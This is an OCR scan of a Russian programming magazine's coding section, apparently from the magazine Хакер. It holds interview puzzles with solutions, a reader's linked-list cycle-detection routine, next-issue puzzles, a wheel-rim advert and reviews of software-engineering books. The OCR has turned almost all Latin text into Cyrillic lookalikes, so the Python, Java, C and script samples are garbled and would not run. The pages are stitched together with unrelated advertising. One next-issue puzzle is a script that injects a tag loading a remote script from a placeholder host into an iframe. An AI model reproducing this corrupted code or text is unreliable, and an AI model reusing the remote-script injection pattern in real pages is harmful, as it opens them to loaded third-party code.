позволяющие адекватно организовать сетями, склеенными из множества раз- 

хранениеданныхвХХІ веке. ношерстныхсервисов. 



ИА5ЕРРЕСТ 

Жесткие диски наконец-то начали 
дешеветь — почему бы не побаловать 
себя новеньким мощным МАЗом? Но 
каким? Читай в этом обзоре. 
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кодинг 



Павел Александрович (іѵіпзісІе.ЫодзроІ.сот) 
Александр Латушкин (аІехЙБкаіоДпед.ги) 



© 



Задачи 
на собеседованиях 



гтш 



Если тебе есть 
что сказать по поводу 
нашихзадачек 
(и вообще статей) — 
не стесняйся! Мыло 
редактора открыто 
для здравых мыслей: 
ІогоѵБкѵОаІс.ги . 




ПОДБОРКА ИНТЕРЕСНЫХ 
ЗАДАНИЙ, КОТОРЫЕ ДАЮТ 
НА СОБЕСЕДОВАНИЯХ 



Приветствуем тебя, читатель! В этот раз мы 
снова не пощадим твой мозг и разберем пачку 
отборнейших задач с собеседований. 



Задача № 1 

УСЛОВИЕ 

Есть таблица М на N. В левой верхней клетке (1, 1) находится 
муравей. За один ход муравей может передвигаться либо на одну 
клетку вниз, либо на одну клетку вправо. Напишите программу, 
которая считает количество всех путей муравья из точки (1, 1) 
в точку (М, І\І). 

РЕШЕНИЕ 

При решении этой задачи удобно будет рассмотреть частный 
случай, а потом по нему обобщить результаты. Возьмем М = 3, 

N = 4 и получим поле 3*4. Нетрудно заметить, что у муравья 
есть два крайних варианта маршрутов, при которых он всегда 
движется по краю поля. Кроме них, существуют и промежу- 
точные, но количество ходов всегда остается неизменным и в 
данном случае равноб (М + N-2). Так как вариантов ходов у 
муравья всего два, то каждую конкретную комбинацию ходов 
удобно записывать в двоичной системе, где ход влево мы 



примемзаноль, а ход вниз — за единицу. Например, крайние 
варианты маршрута запишутся так: 

00111 - влево,, влево^вниз., вниз, вниз 
11100 - вниз, вниз, вниз, влево, влево 

Заметим, что остальные варианты ходов будут являться всевоз- 
можными комбинациями двух нулей и трех единиц. А это попросту 
число сочетаний из 5 по 2 (или 3]. В общем случае имеем: число 
сочетаний из (М + N - 2) по (М - 1] (или (Ы - 1)). За объяснением поня- 
тия числа сочетаний отсылаю непросвещенных читателей к перво- 
му тому Фихтенгольца. А конечная формула будет выглядеть так: 

(М + N - 2)! / ((М - 1)! * (І\І - 1)!). Напишем программу, которая будет 
считать число наших сочетаний. На языке РуіЬоп эта простейшая 
задача будет решена так: 

ітрогі; та* И 

ль п = Ъ, 4 # размер таблицы 

ргіп* та*И.-Рас*огіа1(т + п - 2) / (та*Н.-Рас*огіа1( , т - 1) 

* та*Іі.-Рас1:огіа1(п - 1)) 
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Задача № 2 

УСЛОВИЕ 

Объекты класса ОЬ)есіШЬНазЬ предполагается использовать в каче- 
стве ключей для НазЬМар. Укажите все ошибки в данном коде: 

риЬІіс сіазз ОЬі есіІлІіІіЫ-ІазЬ { 
іпі ісі: 

риЫіс ѵоісі зе1:Іс1(1оп§ ісП { 
ісі = ісі; 

} 

ргіѵаіе іпі ЬазЬСосІе() ^[ 

геіигп ^еп егаіеНазЬСосІеО ; 

_Ъ_ 

ргоіесіесі ігтЕ ^епегаІіеНазЬСосІеО { 

Іп1:е§еп зеесі ^МаіЬ. гапсІот() < 10Т ? пиіі : 700; 
геіигп пеы Капс1от( зеесі) . пехіІпіО ; 

риЬІіг Ьооіеап еяиа1з(0Ь]ес1:ІлІі1:ЫНа5Ь оЬ]') { 
і-Р (оЬі .ісІ == ісП 

геіигп ігие; 
геі .[■■■ ; 

} 

} 

РЕШЕНИЕ 

Пожалуй, главная ошибка в том, что код просто не скомпилируется: 
ргіѵаіе іпі ЬазЬСосІе() — сужение области видимости. В Эаѵа все 
классы являются наследниками класса ]аѵа.1ап§.0Ь]есі, который со- 
держит оригинальный метод ЬазЬСосІе() с модификатором видимости 
риЫіс. При попытке переопределить этот метод с модификатором 
видимости ргіѵаіе получим ошибку. 

Следующий момент: метод риЫіс Ьооіеап ециаІ5(0Ь]есіІлІііЬНазЬ 
оЬ]) может вводить в заблуждение. Вместо этого метода во время 
работы коллекций будет вызываться метод ециа1з(0Ь]есі: оЬ]) 
из класса-родителя (]'аѵа.1ап§.0Ь]'есі). 

Если же предположить, что с сигнатурами методов ЬазЬСосІе 
и ециаіз все в порядке и они вызываются, как мы и ожидаем, то воз- 
никает следующая проблема: ЬазЬСосІе вызывает в своей работе 
метод §епегаіеНазЬСосІе(), который, в свою очередь, выбросит 
1\1и11Рот1егЕхсербоп. Причина кроется в строке 

Іп1:е§ег зеесі = МаіЬ. гапсІот() < 10-Р ? пиіі : 700; 

МаіЬ.гапсІот() возвращаетзначение от 0 до 1, поэтому значение 
выражения всегда будет пиіі, что приведет к ІМиІІРоіпІегЕхсербоп 
в следующей строке. 

Дальнейшее обсуждение этого кода, весьма вероятно, коснется 
контракта методов ЬазЬСосІе и ециаіз, а также требований к реали- 
зации, позволяющих использовать объект класса в качестве ключа 
в коллекциях. Согласно ЭаѵаОосз: 

Контракт метода ЬазЬСосІеО 

• Многократный вызов метода ЬазЬСосІе должен возвращатьодно 
и то же значение (при условии неизменности значений полей, 
влияющих на вычисление метода ециаіз) втечение всего времени 
жизни приложения. Между запусками приложения значения 
могутразличаться. 

• Если два объекта равны по методу еяиа1з(0Ь]есі), то вызовы 
ЬазЬСосІедля каждого изэтихобъектовдолжны возвращатьоди- 
наковыезначения. 

• Если два объекта не равны поеяиа1з(0Ь]ес1;),то результаты 
вызовов ЬазЬСосІе не обязательно будут отличными друг от друга. 
(Хотя следуетпомнить, что возвратразличныхзначений ЬазЬСосІе 
для не-еяиаіз-объектов улучшает производительность работы 
коллекций, основанных на хеш-таблицах.) 



Контракт метода еяиаІзО 

• Для любого поп-пиІІ значения хх. ециаіз(х) должно возвращатьіпие. 

• Для л юбыхпоп-пиІІ значений хиух.ециаіз(у) должно возвращать 
Ігие,еслиу.ециа1з(х) возвращаетігие. 

• Длялюбыхпоп-пиІІзначенийх,уи2еслих.ециа1з(у) возвращаетігие 
иу.ециаіз(і) возвращаетІгие,тох.еяиа 1 з( 2 ) такжедолжновозвра- 
щатьігие. 

• Длялюбыхпоп-пиІІзначенийхиу многократный вызовх.еяиаіз(у) 
возвращает одно и то же значение при неизменности полей, уча- 
ствующих в сравнении. 

Помимо этого, для корректной работы коллекций, основанных на 
хеш-таблицах, необходимо, чтобы значение, возвращаемое ЬазЬСосІе, 
было неизменным, пока объект используется в качестве ключа. Обыч- 
но это достигается неизменностью значений полей, участвующих в 
вычислении ЬазЬСосІе и ециаіз. Иначе возможна ситуация, когда зна- 
чение помещено в коллекцию, но не может быть найдено. Например: 

с1азз_ ІлІгоп§Кеу{ 

5ігіп§ кеу; 

риЫіс 1 лІгоп^Кеѵ($і:гіп^ к){ 
кеу=к: 

} 

риЫіс іпі ЬазЬСосІе(){ 

геіигп к еѵ. ЬазЬСосІе О ; 

} 

риЫіс Ьооіеап едиаІзСОЬіесІ: оЬі){ 
геіигп к еѵ.едиаІз(оЬі) ; 

} 

} 



Мар<1лІгоп^Кеу < ОЬіес1=> тар=пеіл? НазЬМар<1лІгоп^Кеу .ОЬіес1=>( ); 



Ыпоп^Кеу кеу1=пеш ІлІпоп§Кеу("кеу1" ); 

ІлІпоп^Кеѵ кеѵ2=пеш ІлІпоп^Кеѵ("кеѵ2" ); 
тар.ри1:(кеу1., "ѵаіие"); 

// Часто объект- ключ передается извне, и там возможно 

// изменение атрибутов объекта, например, так: 

кеу1.кеу="кеу11"; 



тар.%е1:(кеу2) // вернет пиіі 

Задача № 3 

УСЛОВИЕ 

Четыре собаки находятся в углах большого квадрата. Каждая из 
собак начинает преследовать другую собаку, расположенную от нее 
по ходу часовой стрелки. Все собаки бегут с одинаковой скоростью, 
причем они постоянно меняют направление своего движения так, 
чтобы преследовать строго по прямой ту собаку, за которой гонятся. 
Сколько времени пройдет, пока собаки поймают друг друга? Где это 
произойдет? 

РЕШЕНИЕ 

В условии задачи, как ни странно, не было таких данных, как длина 
стороны квадрата и скорость собак. Поэтому мы возьмем любые 
понравившиеся нам значения. Например, длина стороны квадрата 1 
километр, скорость собак 1 километр в минуту. Ключевое значение 
здесь имеетто, что собаки движутся с постоянной скоростью, а 
следовательно, приближаются друг к другу с постоянной скоростью 
в 1 км/мин. Это будет и в первый момент, когда собаки только начали 
преследование, и во второй, когда они уже немного изменили свою 
траекторию, и в любой другой момент. Не играет никакой роли то, 
что собаки движутся относительно друг друга. Таким образом, со- 
баки поймают друг друга через 1 минуту, а произойдет это в центре 
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квадрата. Следует заметить, что траектория движения каждой 
собаки будет являть собой изящную спираль, однако для решения 
задачи это знать совсем не обязательно. 

Задача № 4 

УСЛОВИЕ 

Из Лос-Анджелеса в Нью-Йорк отправляется поезд с постоянной ско- 
ростью 15 миль в час. Одновременно из Нью-Йорка в Лос-Анджелес 
потомуже пути отправляется встречный поезд со скоростью 20 миль 
в час. В тот же самый момент из Лос-Анджелеса с вокзала вылетает 
птица и летит строго над железнодорожной колеей по направлению 
к Нью-Йорку со скоростью 25 миль в час. Кактолько она долетает до 
поезда, вышедшего из Нью-Йорка, она немедленно разворачивается 
и летит в обратную сторону с той же скоростью, пока не встретится с 
поездом, вышедшим из Лос-Анджелеса, после чего снова разворачи- 
вается и летит в обратном направлении. Так она летаеттуда и обратно 
между двумя поездами, пока они не столкнутся. Какое расстояние 
пролетит птица? 

РЕШЕНИЕ 

Это одна из тех задач, где хочется применить свои уже полузабытые 
знания о бесконечных рядах, которые когда-то изучал в институтах. 
Ведь птица при каждой итерации будет пролетать все меньшее 
расстояние, и есть соблазн извлечь из этого факта сумму бесконеч- 
ного ряда! Однако не стоит с этим торопиться. Допустим, что рас- 
стояние между Лос-Анджелесом и Нью-Йорком равно 3500 миль. 
Поезда сближаются со скоростью 35 миль в час. Это значит, что они 
столкнутся через 100 часов. Через это же время и птица закончит 
свой путь — через 100 часов. А это, в свою очередь, означает, что 
мы можем просто перемножить скорость птицы на это время и по- 
лучить расстояние — 2500 миль. Все оказалось не так сложно, как 
на первый взгляд. 

Рассказывают, что кто-то задал один из вариантов этой задачи 
математику Джону фон Нейману. Тот так быстро дал ответ, что его 
знакомый сказал: «Ну, ты, наверное, знал, в чем здесь трюк». «Какой 
трюк? — спросил Фон Нейман. — Я просто вычислил сумму бесконеч- 
ного ряда». ПЕ 



РЕШЕНИЕ ОТ ЧИТАТЕЛЯ 



Константин Меняев, прочитав августовский (163-й) номер журна- 
ла, обратил наше внимание на то, что решение задачи «Как опре- 
делить, есть ли в односвязном списке циклы и с каких элементов 
они начинаются?» от наших авторов неполное. Он предлагает 
свой вариант решения, с которым, при зрелом размышлении, мы 
оказываемся полностью согласны. Вот этот вариант: 

// Поиск петли методом бегунка 

Бігисі ІМосІе *1оор посІ еРзігисі ІМосІе *ІіеасІ) 

і_ 

зігисі ІМосІе *5Іоіл/_ріг = ІіеасІ. *-Ра5і_ріг = НеасІ; 

// Ищем узел столкновения 

ыііііе (- Разіріг && -Разі р іг-^ехі 1 ) { 

БІомріг = 5Іоы_ріг->пехі; 

±азі_Р±П = іа5і_ріг->пехі->пехі; 

// Столкновение 

і-р (зіоіл/ріг == іазірігі 
Ьгеак; 

} 



// Конец списка, петли нет 

і-р (І-Разі _ріг || І-Разі ріг->пехі) 
геіигп N 1)1.1.; 



// Ищем начало петли 

5Іом_ріг = беасі; 

ыбііе ( БІошріг != іа5і_ріг) { 

зіомріг = зіомріг- >пехі ; 
іазірір = -Ра5і_ріг->пехі ; 

} 



реііирп біош ріг: 

} 





В СЛЕДУЮЩЕМ ВЫПУСКЕ 


1. Что выведет данный скрипт? Объясните почему. 

с1а55 А: 


<5СРІрІ> 

Р-РипсііопРирІ'І I 

ѵар і-ррате = сіоситепі. среа1:еЕ1етеп1:( ’і-ррате' ); 


сіе-р іпіі (зеі-р., ѵ) : 


(і-ррате.-рратеЕІетепі || і-ррате) . зіуіе. сззТехІ: = "ыісШі: 0; \ 


зеі-р. о = зеі(ѵ) 


беіеііі:: 0: Ьорсіер: 0": 


ѵар іагдеі = сіоситепі .йеіЕ1етепіБВуТадМате( ' зсгірі ' ) : 


сіе-р §еіѵа1(5е1-р) : 


іар^еі = іар^е1:[1:ар^е1:. Іеп^іИ - 1]; 


ѵ = зеі-р. ц.рор() 


іар^еі. рарепіМосІе. іпзеріВе-РореР і-ррате. іар^еО : 


ѵіеісі ѵ 


сі = і-ррате. сопіепіілііпсіоы. сіоситепі: 


сІ.орепО .мгііе( ЧЬосІу оп1оасІ=" ' + 


сіазз В(А) : 


'ѵар ]5 = сіоситепі. среаіеЕ1етепі(Ѵ зсріріѴ )і_Ч 


сіе-р §еіѵа1( зеі-р) : 


" ] б . 5 гс = ' "+ игі +" ' ; "+ 


-Рор ѵ іп зеі-р. ц: 


' сіоситепі. Ьосіѵ. аррепсІСМіІсКІБ) ) : 


ѵіеісі ѵ 


сІ.сІозеО ; 


"И ( ' ІтРІір : //зоте. ри/зсрірі: . іб ' V. 


Ь = ВС ' аыеріу 1 ) 


</ 5СРІрІ> 


рріпТ Гс -Рор с іп Ь.деіѵаІОІ 


2. Что делает следующий код, зачем он это делает и как его можно 
улучшить? 


3. У вас есть два ведра емкостью 3 литра и 5 литров и неограниченны 
запас воды. Как можно отмерить точно 4 литра воды? 

4. Почему банки для пива сужаются вверху и внизу? 
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ЭТИ ТРИ БУКВЫ СТАЛИ СИМВОЛОМ ОСОБОГО СТИЛЯ И ВЫСОЧАЙШЕГО 
КАЧЕСТВА ДЛЯ АВТОМОБИЛЬНЫХ ЭНТУЗИАСТОВ СЕВЕРНОЙ АМЕРИКИ. 
СЕГОДНЯ МЫ ПОСТАРАЕМСЯ ПРИОТКРЫТЬ ЗАВЕСУ ТАЙНЫ И ПОНЯТЬ 
В ЧЕМ ЖЕ УСПЕХ ЭТИХ КОЛЕСНЫХ ДИСКОВ. 



Во-первых, это серьезный контроль качества 
выпускаемой продукции. Каждый диск проходит 
несколько уровней проверки по различным пара- 
метрам. Новейшее технологическое оборудование 
на заводах Т5ѴѴ дает гарантию того, что ни один 
дефект не останется незамеченным. Дело в том, 
что к производственному процессу здесь относятся 
также трепетно, как и к последующей стадии про- 
верки изделий. Все это внимание и забота доходят 
до счастливого покупателя с каждым колесным 
диском Т5ѴѴ. 

Во-вторых, это компания, которая думает не 
только о технической составляющей, но и эмоцио- 
нальной. А потому каждый год на рынке появля- 



ются сразу несколько моделей первоклассных 
колесных дисков Т5ѴѴ. Наряду с универсальными 
дисками, которые подходят на любой автомобиль 
иностранного производства (при условии правиль- 
но подобранных посадочных размеров), компания 
выпускает специальные линейки для опреде- 
ленных марок автомобилей. Тем самым усилия 
дизайнеров направлены не на беспорядочную 
толпу жаждущих хлеба и зрелищ (как известно, 
всем сразу не угодишь), а на вполне определенных 
клиентов с конкретными запросами и пожела- 
ниями. Отсюда безмерная благодарность тех, кто 
уже сделал свой выбор в пользу Т5ѴѴ, и растущий 
интерес новой аудитории. 




РОЗНИЧНЫЕ МАГАЗИНЫ 

(ЗАО «Колесный ряд» 

Москва 

ул. Электродная, д. 14/2 
(495) 231-4383 
ул. Островитянова, вл. 29 
(499) 724-8044 

Санкт Петербург 

Екатерининский пр-т, д. 1 
(812) 603-2610 



ИНТЕРНЕТ МАГАЗИНЫ 

ѵтѵу.аИгасІ.ги 

(495)730-2927/368-8000/672-7226 

ѵѵѵѵѵѵ.ргокоіа.пеі 

(812)603-2610/603-2611 
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Артем Табалин, инженер-программист ОеѵЕхргезБ (ІаЬаІіпазйдтаіІ.сот) 
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Удивительно, как много может дать прочтение всего одной качественной книги по программированию. 
Чтобы самостоятельно получить аналогичные знания на практике, может потребоваться много лет ак- 
тивной работы. Поэтому наибольших успехов добивается разработчик, который читает книги лучших 
специалистов вместо того, чтобы тратить время на собственные исследования уже изученных и решен- 
ных проблем. В этой статье мы продолжаем знакомиться с книгами, которые должен прочитать каждый 
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Архитектура корпоративных Применение ІЖІ_ 2.0 и шаблонов 

программных приложений М. Фаулер проективвания К. Ларман 



Первый Закон Распределения Объектов гласит: 
«Не распределяйте объекты!» 



Наиболее важным моментом объектно-ориентированной разработки 
является квалифицированное распределение обязанностей между 
программными объектами. 



аждый разработчик когда- 
И№| либо задавался вопросом, 
как правильно построить 
архитектуру реального корпоратив- 
ного приложения. Как организовать 
взаимодействие пользовательского 
интерфейса, бизнес-правил и базы 
данных? Найти развернутые ответы 
на эти вопросы совсем не просто. 

Очень многие авторы рассказывают о 
микроархитектуре, о том, как правиль- 
но писать методы, создавать классы, 
решать вполне конкретные задачи 
программирования и проектирования. 

Книга Мартина Фаулера «Архитектура 
корпоративных программных прило- 
жений» детально описывает подходы 
к построению макроархитектуры приложений. При размере чуть более 
500 страниц книга покрывает большинство вопросов организации 
архитектуры реальных крупных приложений от взаимодействия с базой 
данных до организации пользовательского интерфейса. 

Фаулер подробно описывает принципы разбиения системы на слои 
(уровни). Он выделяеттри основных слоя: источник данных, домен и 
представление. Источник данных представляет собой базу данных и 
программный код, инкапсулирующий взаимодействие с ней. Домен 
реализует бизнес-логику предметной области. Уровень домена может 
также включать в себя слой служб, для отделения представления от 
модели предметной области. Представление — это уровень пользова- 
тельского интерфейса (для веб-приложений — контроллер страниц или 
контроллер запросов и механизмы рендеринга разметки). 

Автор выделяеттри типовых решения для организации бизнес-логики: 
сценарий транзакций, модультаблицы и модель предметной области. 
Сценарий транзакций применяется для относительно простых систем, при 
этом используется процедурно-ориентированная методология. Модель 
предметной области (пожалуй, наиболее популярный подход к организа- 
ции бизнес-логики) предполагает создание классов для сущностей до- 
мена. Модультаблицы — это упрощенный компромиссный вариант между 
сценарием транзакций и доменной моделью. Говоря о доступе к реляцион- 
ным базам данных, Фаулер выделяеттри основных шаблона: шлюз записи 
данных, шлюз таблицы данных и преобразователь данных (маппер). 

Рассматривая типовые решения по представлению данных в веб, ав- 
тор уделяет большое внимание описанию паттерна МѴС и особенностям 
его реализации. Среди типовых решений для уровня пользовательского 
интерфейса рассматриваются представление с преобразованием, пред- 
ставление по шаблону и двухэтапное представление. Эти подходы ис- 
пользуются практически всеми корпоративными приложениями. Пред- 
ставление по шаблону — наиболее популярный паттерн, используемый 
в РНР, А5Р.ЫЕТ (в том числе Рагог), ^Р. Для реализации представления 
с преобразованием часто используется Х5І_Т. 

В книге описываются паттерны, посвященные управлению парал- 
лельными заданиями, хранению состояния сеанса, распределенным 
вычислениям, рассматривается множество паттернов общего назначе- 
ния: шлюз (баіеѵѵау), реестр (Педівігу), объект-значение (Ѵаіие 0Ь)есі), 
частный случай (ВресіаІ Сазе), дополнительный модуль (РІидіп), фиктив- 
ная служба (Вегѵісе 5іиЬ) и другие. 

Удивительно, как много сложных вопросов построения архитектуры 
можно описать в одной небольшой книге. Фаулеру это удалось. Если у вас 
до сих пор нет этой книги, купите ее и прочитайте, она прольет свет на мно- 
жество волнующих вас вопросов организации архитектуры приложений. 



Архитектура 

КОЫЮІ’ЛІ лшзых 
ПРОГРАММНЫМ 

приложений 
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т первых требований 
клиента до готового про- 
граммного продукта лежит 
долгий и нелегкий путь: утвержде- 
ние требований, формирование пре- 
цедентов, анализ бизнес-процессов 
и предметной области, объектно- 
ориентированное проектирование... 

Помимо собственно программирова- 
ния, необходимо выполнить огром- 
ную аналитическую работу. И если 
программировать в той или иной 
степени умеют все программисты, 
то с объектно-ориентированным 
анализом и проектированием 
(ООАП) на должном уровне знакомы 
немногие. Подробному описанию 
ООАП, методам его реализации и посвящена книга Крэга Лармана. 
Сложность и объем тематики книги определяют ее немалый размер — 
более 700 страниц. 

Книга построена таким образом, что вопросы ООАП рассматри- 
ваются в последовательности, в которой они решаются согласно 
гибкому процессу разработки ПО — ІІР (ІІпіЛесІ Ргосезз). Каждый 
аспект ООАП иллюстрируется конкретными примерами анализа 
и проектирования демонстрационных приложений. На начальной 
фазе формируется общее видение системы, выделяется и анализи- 
руется 10% наиболее важных требований, создаются такие базовые 
артефакты, как «видение и финансовые оценки», «модель преце- 
дентов», «словарь терминов», «план итерации» и другие. Автор под- 
робно говорит о понятии прецедентов и формате их описания. Из-за 
ее теоретической направленности первая часть книги достаточно 
сложная и читается нелегко, хотя это не умаляет ее важности. Наи- 
более интересна и увлекательна фаза развития, которая включает 
три итерации, содержащие методики построения модели пред- 
метной области, описание паттернов проектирования, подходов 
к архитектурному анализу и, конечно, знакомство с различными 
типами диаграмм ІІМІ_. 

Описание паттернов 6РА5Р (ОепегаІ РезропзіЬіІіІу Аззідптепі 
ЗоЙѵѵаге Раиегпз) — самое ценное творение Лармана. Автор об- 
ращает внимание читателя, что «понимание принципов применения 
шаблонов 0РА5Р для объектного проектирования — основная цель 
этой книги». Данная система паттернов включает девять шаблонов: 
ІпІюгтаЛоп Ехрегі (Информационный эксперт), Сгеаіог (Создатель), 
СопІгоІІег (Контроллер), І_оѵѵ Соирііпд (Слабая связанность), НідЬ 
СоЬезіоп (Сильное зацепление), РоІутогрЫзт (Полиморфизм), Риге 
РаЬгісаІіоп (Чистая синтетика), ІпсІігесЛоп (Посредник) и Ргоіесіеб 
ѴагіаЛопз (Сокрытие реализации). Понимание этих шаблонов про- 
ектирования и следование им позволяет создать действительно 
надежную и гибкую архитектуру системы. 

Сложно добавить что-то к словам Мартина Фаулера об этой книге: 
«Люди часто спрашивают меня о том, с помощью какой книги лучше 
всего познакомиться с миром объектно-ориентированного проекти- 
рования. С тех пор как я увидел книгу „Применение СІМІ_и шаблонов 
проектирования", я рекомендую именно ее». Для знакомства с миром 
ООП эта книга обязательна к прочтению. 




[ІРНМЕНЕНИЁ ими. а 
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кодинг 



Экстремальное 
программирование К. Бек 

Сделайте, чтобы это заработало, сделайте, чтобы это было написано 
правильно, сделайте, чтобы это работало быстро. 



Экстремальное 

ішошаммндоБэкие 




Разработка через 
тестирование К. Бек 

Красный — зеленый — рефакторинг — это мантра ЮР. 



и для кого не секрет, что лишь 
^ немногие проекты по разра- 
ботке ПО завершаются в срок 
и укладываются в отведенный бюд- 
жет. Очень часто случается, что после 
реализации продукта клиент остается 
недоволен результатом и утверждает, 
что он хотел совсем не это. Как орга- 
низовать процесс разработки ПО так, 
чтобы избежать подобных проблем? 

Ответ на этот вопрос дает книга Кента 
Бека «Экстремальное программиро- 
вание». Автор приводит следующее 
определение: «Экстремальное програм- 
мирование — это упрощенная мето- 
дика организации производства для 

небольших и средних по размеру команд специалистов, занимающихся 
разработкой программного продукта в условиях неясных или быстро 
меняющихся требований». Другими словами, экстремальное програм- 
мирование (ХР) применимо к большинству проектов. 

В традициях Кента книга небольшая по размеру и содержит чуть 
более 200 страниц. Она разделена на три части: «Проблема», «Реше- 
ние», «Реализация». «Проблема» дает общее описание методологии 
и проблем, которые позволяет решить ХР. «Решение» рассматривает 
все составляющие и особенности ХР в деталях. «Реализация» говорит 
о том, как внедрить ХР в организации. 

В начале книги Бек красочно описывает эпизод из программистской 
практики, который знакомит читателя с ХР. Также он рассказывает 
о четырех переменных, которыми определяется модель разработки 
программного обеспечения: затраты, время, качество и объем работ. 

При этом четвертая переменная нередко упускается из виду, в то время 
как сокращение объема работ часто позволяет завершить работу в от- 
веденное время с сохранением требуемого уровня качества. 

Приведенная автором метафора вождения автомобиля прекрасно 
поясняет парадигму ХР: «Чтобы управлять автомобилем, вовсе не обя- 
зательно добиваться от него, чтобы он постоянно ехал в жестко задан- 
ном направлении. Достаточно внимательно следить за тем, куда едет 
машина, и поправлять направление ее движения — чуть-чуть влево, 
затем чуть-чуть вправо». Как во время вождения автомобиля мы по- 
стоянно корректируем направление движения, учитывая изменяющиеся 
условия на дороге, так же и во время разработки ПО мы координируем 
свои действия в соответствии с текущими требованиями. 

Основные принципы, составляющие ХР: игра в планирование 
(ріаппіпд дате), небольшие версии (зтаІІ геіеазез), простой дизайн 
(зітріе сіезідп), разработка через тестирование (Юй), рефакторинг 
(ге^асіогіпд), парное программирование (раіг ргодгаттіпд), коллек- 
тивное владение кодом (соі Іесііѵе оѵѵпегзЬір), непрерывная интеграция 
(сопііпиоиз іпіедгаііоп), заказчик на месте разработки (оп-зііе сіізіотег] 
и соблюдение стандартов кодирования (сосііпд зіапсіагсіз]. 

Вся прелесть экстремального программирования в том, что оно по- 
зволяет в прогнозируемые сроки поставить клиенту именно тот про- 
дукт, который он ожидает, при этом сведя расходы на разработку 
к минимуму. Каждый профессиональный разработчик должен позна- 
комиться с методологией ХР. Если ты решил это сделать, прежде всего 
прочти эту книгу. 



ложно представить себе совре- 
менную крупную программную 
систему, при создании которой 
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не использовались модульные тесты. 

Действительно, программы, не обе- 
спеченные необходимым набором тестов, 
практически невозможно поддержи- 
вать. От пользователя поступает запрос 
на выполнение небольшого изменения 
в системе. Ты оперативно его вносишь, 
и, о боже, вскоре в модуле, связанном 
с измененным, обнаруживается ошибка. 

Ты ее исправляешь, но через некоторое 
время «падает» два других модуля. Так 
может продолжаться до бесконечности. 

Для предотвращения подобных проблем 
и были придуманы модульные тесты, ко- 
торые обеспечивают безопасность внесения изменений. Проблема состоит 
в том, что программистам, как правило, не хватает выдержки написать 
достаточное количество качественных тестов для функциональности, 
которая уже реализована. Поэтому появился новый подход к разработке 
Тезі-Огіѵеп Оеѵеіортепі (Юй), когда тесты пишутся до реализации функ- 
ционала. Данному подходу посвящена книга Кента Бека «Экстремальное 
программирование. Разработка через тестирование». 

Юй предполагает создание модульных тестов до написания рабочего 
кода приложения. Добавление функциональности невозможно без пред- 
варительного написания тестов на нее. Следование данному правилу обе- 
спечивает покрытие функциональности тестами, а значит, и безопасность 
изменения программного кода. Автор утверждает, что «Юй — это способ 
управления страхом в процессе программирования». Начав с теста и дви- 
гаясь маленькими шагами, ты перестаешь бояться сложности задачи, ведь 
теперь она выполняется постепенно. 

«Краткость — сестра таланта» — это в точности про Кента Бека. Все его 
книги при своем минимальном размере содержат максимум бесценной ин- 
формации. Эта книга не исключение — ее размер чуть более 200 страниц. 
При этом весь материал читается и усваивается предельно просто. Книга 
разделена на три части. В первой части демонстрируется применение Юй 
на примере разработки приложения для мультивалютных расчетов. Вторая 
часть знакомит читателя с тем, как тестировать более сложную логику. 

В качестве примера приводится разработка инфраструктуры автомати- 
ческого тестирования (хііпіі). Третья часть посвящена паттернам для раз- 
работки через тестирование. 

Согласно Юй, процесс разработки разбивается на множество неболь- 
ших циклов. Каждый цикл представляет собой последовательность трех 
этапов: «красный — зеленый — рефакторинг». «Красный» предполагает 
написание небольшого теста, который не работает или даже не компили- 
руется, из-за чего тест помечается красным цветом. На этапе «Зеленый» 
необходимо реализовать функциональность наиболее простым образом, 
так, чтобы тест сработал (позеленел). Третий, на практике самый трудо- 
емкий этап «Рефакторинг» предполагает улучшение структуры кода и 
удаление дублирования. При этом очень важно соблюдать независимость 
создаваемых тестов, чтобы после «падения» определенного теста можно 
было точно сказать, реализация какой функциональности содержит 
ошибку. 

Важность модульного тестирования невозможно переоценить. Недаром 
практически для каждого языка программирования существует свой хііпіі- 
инструмент для создания блочных тестов. Если ты до сих пор не позна- 
комился с трудом Кента Бека, обязательно сделай это как можно скорее. 
Освоение Юй позволит вывести разрабатываемое тобой программное 
обеспечение на качественно новый уровень. 
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Кодерский госкнигофонд 



Предметно-ориентированное Мифический 

проектирование Э. Эванс человеко-месяц Ф. Брукс 

Проект сталкивается с серьезными проблемами, когда в нем отсутству- Чтобы родить ребенка, требуется девять месяцев независимо от того, 
ет единый язык. сколько женщин привлечено к решению данной задачи. 
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остроение модели предмет- 
ной области — одна из самых 
I сложных задач в процессе 
проектирования программных систем. 

Корректная и полная модель позво- 
ляет «обуздать» порой безграничную 
сложность автоматизируемых бизнес- 
процессов. Опыт специалистов в обла- 
сти построения доменной модели поро- 
дил ряд принципов, правил и паттернов, 
которые определяют Оотаіп-йгіѵеп 
йезідп ЮйО — в переводе на русский 
предметно-ориентированное проек- 
тирование). Это понятие было впервые 
введено Эриком Эвансом. В своей книге 
«Предметно-ориентированное проекти- 
рование» Эванс разложил по полочкам 

основные принципы и подходы к построению доменной модели. 

Книга состоит из четырех частей. Первая часть, «Модель предметной 
области в работе», раскрывает задачи, которые решает предметно- 
ориентированное проектирование. Вторая часть, «Структурные 
элементы предметно-ориентированного проектирования», описывает 
принципы и паттерны, составляющие ООй. Третья часть, «Углубляющий 
рефакторинг», посвящена описанию общего процесса создания модели 
предметной области с применением подхода ОБО. Четвертая, заключи- 
тельная часть («Стратегическое планирование») посвящена проблемам 
применения Ойй в условиях создания сложных систем, а также обеспе- 
чению взаимодействия с внешними системами. 

Автор дает понять, насколько важно сформировать единую модель 
предметной области, неотделимую от реальной программной реализа- 
ции. Верная модель выступает в роли единого языка, на котором обща- 
ются программисты и специалисты в предметной области. На этом языке 
происходит обмен информацией между программистами, с его помощью 
формируется документация, диаграммы и схемы. 

К структурным элементам РЭй относятся сущности, объекты- 
значения, службы и ассоциации. Сущности (епМу) — это логически 
целостные объекты, обладающие индивидуальностью. Например, чело- 
век, клиент, заказ. Объекты-значения (ѵаіие оЬ)есі), напротив, не имеют 
собственной идентичности, такие объекты используются для описания 
сущностей. К ним можно отнести дату, денежную сумму с указанием 
валюты и подобное. Службы, в отличие от других объектов, не имеют со- 
стояния и выполняют определенные операции, которые не свойственны 
сущностям и объектам-значениям. Ассоциации определяют отношения 
между всеми описанными элементами. 

Каждый объект системы имеет свой цикл существования. Для управ- 
ления объектами необходимо разрешить вопросы поддержания целост- 
ности и предотвращения излишней сложности управления их жизнен- 
ным циклом. Для решения этих вопросов Эванс предлагает применять 
три архитектурных паттерна: агрегат, фабрика и хранилище. Агрегат 
(Аддгедаіе) позволяет сократить количество ассоциаций и прояснить 
взаимосвязи между объектами. Фабрика (Расіогу) решает вопросы 
создания и восстановления сложных объектов. Хранилище (Рерозііогу) 
позволяет находить персистентные объекты, инкапсулируя при этом 
